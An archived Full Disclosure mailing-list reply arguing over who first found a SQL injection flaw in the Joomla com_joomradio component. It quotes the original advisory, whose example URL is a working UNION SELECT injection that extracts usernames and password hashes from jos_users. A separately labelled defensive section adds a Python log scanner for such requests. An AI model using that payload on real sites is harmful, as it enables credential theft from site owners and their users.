Full Disclosure mailing list archives
Re: Joomla Component com_joomradio SQL Injection
From: bobby.mugabe () hushmail com
Date: Thu, 19 Feb 2009 10:22:48 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear gov-boi,

Please follow the established etiquette of this list by linking to content on archive.org to establish credibility for alleged historic content. Linking to obscure post-dated content on your own Internet site, that easily can be faked, isn't the best way to attempt legitimizing your darknet archival endeavours.

Many on this list are sceptical about your claim regarding the previous discovery of this important computer security issue, and to be quite frank find your attempts to discredit the king of gods' effort to secure this critical piece of Internet infrastructure known as the joomla joomradio something-or-other.

Mr. Zeus - on behalf of my country I would like to express our sincere thanks for reporting this severe issue, whether or not it was previously and independently discovered and reported, and hope you continue to contribute your research to this list of full disclosure and helping to make the Internet a safer place for everyone.

I would like to remind everyone that this list is for disclosure of information security materials and that the fascist tactics used by the packetstorm/#darknet crowd as they attempt to once again monopolize the dissemination of information security materials are not appreciated here.

All the best to you and yours,

- -bm

On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm <packet () packetstormsecurity org> wrote:
Already discovered in June, 2008.

http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt
bc9c589fca40fce9a4f4484333f207b5
The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability.
Authored By His0k4 (His0k4.hlm[at]gmail.com)

On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:

###################################################################
######### Advisory X
# Title: Joomla Component com_joomradio SQL Injection
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: arturo_zamora_c () hotmail com
# Website: www.securitybroken.com
# Date: 18/02/09
# Risk: Medium
# Vendor Url: http://ajaxportal.eu/
# Affected Software: JoomRadio
# Script author: XrByte <info () exp ee>, Grusha <grusha () feellove eu>
###################################################################
# Example:
###################################################################
htp://victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNIONSELECTuser(),concat(username,0x3a,password),user(),user(),user(),user(),user()FROM jos_users--
###################################################################
# greetz:
#
# original advisory: http://www.securitybroken.com
###################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
-----END PGP SIGNATURE-----
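For defenders reviewing web server logs for the request shape shown in the quoted advisory, the following is an added example and not part of the original thread: it flags requests to option=com_joomradio whose id parameter is not a plain integer. The log lines are constructed, the function name is hypothetical, and the integer-only rule for id is an assumption about legitimate use.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Feb/2009:10:01:02 -0500] "GET /index.php?option=com_joomradio&page=show_radio&id=7 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [19/Feb/2009:10:03:40 -0500] "GET /index.php?option=com_joomradio&page=show_radio&id=-1+UNION+SELECT+user()-- HTTP/1.1" 200 812',
    '203.0.113.5 - - [19/Feb/2009:10:04:11 -0500] "GET /index.php?option=com_content&id=12:about HTTP/1.1" 200 9034',
    '192.0.2.44 - - [19/Feb/2009:10:06:59 -0500] "GET /index.php?option=COM_JOOMRADIO&page=show_radio&id=3%27 HTTP/1.1" 500 301',
    '192.0.2.44 - - [19/Feb/2009:10:07:03 -0500] "GET /index.php?option=com_joomradio&id=5&id=x HTTP/1.1" 200 640',
]

# Extract the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is a short run of decimal digits.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_joomradio_requests(lines):
    """Return (client_ip, [bad id values]) for each flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs URL-decodes values and keeps every repeat of a parameter.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        options = [value.lower() for value in query.get("option", [])]
        if "com_joomradio" not in options:
            continue  # other components have their own id formats
        bad = [v for v in query.get("id", []) if not VALID_ID_RE.fullmatch(v)]
        if bad:
            hits.append((line.split()[0], bad))
    return hits


if __name__ == "__main__":
    for client, values in suspicious_joomradio_requests(SAMPLE_LOG):
        print(client, values)
```

The same integer-only check, applied to id in the component before the value reaches the query, is the corresponding input-handling fix.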
Current thread:
- Joomla Component com_joomradio SQL Injection 0o_zeus_o0 (Feb 18)
- Re: Joomla Component com_joomradio SQL Injection Packet Storm (Feb 19)
- <Possible follow-ups>
- Re: Joomla Component com_joomradio SQL Injection bobby . mugabe (Feb 19)
- Re: Joomla Component com_joomradio SQL Injectionhas infolookup (Feb 19)